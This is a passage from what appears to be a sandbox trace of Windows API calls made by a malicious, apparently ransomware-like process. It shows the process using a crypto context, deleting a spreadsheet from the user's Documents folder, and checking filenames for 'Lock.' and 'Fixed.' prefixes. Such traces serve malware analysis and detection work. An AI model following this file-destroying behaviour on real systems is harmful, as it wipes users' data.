wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0220.374] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0220.374] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0220.374] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.374] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0220.374] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.375] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0220.375] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.375] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.375] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0220.375] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0220.375] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0220.375] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0220.375] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0220.375] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0220.375] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.375] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0220.375] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0220.375] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0220.375] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0220.375] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0220.375] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.375] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0220.375] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0220.375] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0220.375] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0220.375] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0220.375] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0220.375] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0220.375] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0220.376] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0220.376] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0220.376] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0220.376] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0220.376] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f7020, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0220.376] CryptReleaseContext (hProv=0xa7c770, dwFlags=0x0) returned 1 [0220.376] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.376] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0220.376] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0220.376] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0220.376] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0220.376] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0220.382] FreeLibrary (hLibModule=0x76390000) returned 1 [0220.382] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.382] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.382] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.382] CloseHandle (hObject=0x524) returned 1 [0220.384] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.384] CloseHandle (hObject=0x510) returned 1 [0220.386] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.387] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0220.387] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0220.387] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0220.387] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/RRwZ.xlsx", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\RRwZ.xlsx", lpFilePart=0x8cedf4*="RRwZ.xlsx") returned 0x23 [0220.387] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\RRwZ.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\rrwz.xlsx")) returned 0x20 [0220.387] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\RRwZ.xlsx", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39cd50b0, ftCreationTime.dwHighDateTime=0x1d5b39a, ftLastAccessTime.dwLowDateTime=0xe8718a90, ftLastAccessTime.dwHighDateTime=0x1d59956, ftLastWriteTime.dwLowDateTime=0xe8718a90, ftLastWriteTime.dwHighDateTime=0x1d59956, nFileSizeHigh=0x0, nFileSizeLow=0x13fe5, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="RRwZ.xlsx", cAlternateFileName="RRWZ~1.XLS")) returned 0x9e1c38 [0220.388] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\RRwZ.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\rrwz.xlsx")) returned 1 [0220.390] FindNextFileW (in: hFindFile=0x9e1c38, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39cd50b0, ftCreationTime.dwHighDateTime=0x1d5b39a, ftLastAccessTime.dwLowDateTime=0xe8718a90, ftLastAccessTime.dwHighDateTime=0x1d59956, ftLastWriteTime.dwLowDateTime=0xe8718a90, ftLastWriteTime.dwHighDateTime=0x1d59956, nFileSizeHigh=0x0, nFileSizeLow=0x13fe5, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="RRwZ.xlsx", cAlternateFileName="RRWZ~1.XLS")) returned 0 [0220.390] FindClose (in: hFindFile=0x9e1c38 | out: hFindFile=0x9e1c38) returned 1 [0220.390] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3854290 | out: hHeap=0x2af0000) returned 1 [0220.390] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0220.390] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0220.390] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0220.390] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0220.390] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0220.390] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0220.390] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0220.390] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0220.390] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0220.390] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0220.390] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0220.390] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0220.390] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0220.390] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0220.390] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0220.390] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0220.391] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0220.391] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0220.391] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab098 [0220.391] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0220.391] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0220.391] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf78 [0220.391] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0220.391] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0220.391] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0220.391] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0220.391] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0220.391] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0220.391] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0220.391] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0220.391] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0220.391] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0220.391] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0220.391] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0220.391] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0220.391] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0220.391] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0220.391] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0220.391] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6e80 [0220.391] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0220.391] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x3854380 [0220.391] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0220.391] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0220.391] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0220.392] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0220.392] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0220.392] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0220.392] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0220.392] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0220.392] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6e80 | out: hHeap=0x2af0000) returned 1 [0220.392] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0220.392] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0220.392] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0220.392] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0220.392] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0220.392] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0220.392] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0220.392] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0220.392] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0220.392] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0220.392] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0220.392] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0220.392] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0220.392] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x48) returned 0x2a5dac0 [0220.392] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/RRwZ.xlsx", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\RRwZ.xlsx", lpFilePart=0x8cf650*="RRwZ.xlsx") returned 0x23 [0220.392] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dac0 | out: hHeap=0x2af0000) returned 1 [0220.392] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\RRwZ.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\rrwz.xlsx")) returned 0xffffffff [0220.392] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3854380 | out: hHeap=0x2af0000) returned 1 [0220.392] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0220.393] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0220.393] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0220.393] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0220.393] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0220.393] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0220.393] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0220.393] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0220.393] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0220.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0220.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0220.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0220.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0220.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0220.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0220.393] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0220.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0220.393] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0220.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0220.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0220.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0220.393] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0220.393] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tMLcqE8DzcE8ZL.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0220.393] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MLcqE8DzcE8ZL.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0220.393] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LcqE8DzcE8ZL.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0220.393] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cqE8DzcE8ZL.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0220.393] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qE8DzcE8ZL.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0220.393] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E8DzcE8ZL.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0220.393] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8DzcE8ZL.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0220.393] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DzcE8ZL.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0220.393] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zcE8ZL.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0220.393] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cE8ZL.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0220.394] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E8ZL.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0220.394] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8ZL.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0220.394] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZL.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0220.394] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L.xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0220.394] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xlsx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0220.394] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0220.405] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0220.405] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0220.405] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0220.405] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0220.405] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0220.405] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0220.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed00 [0220.405] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0220.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0220.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0220.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0220.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0220.405] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0220.405] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0220.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0220.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0220.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0220.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0220.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0220.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0220.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0220.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0220.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0220.406] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0220.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0220.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0220.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x28) returned 0x2a69a30 [0220.406] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0220.406] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tMLcqE8DzcE8ZL.xlsx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0220.406] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MLcqE8DzcE8ZL.xlsx", 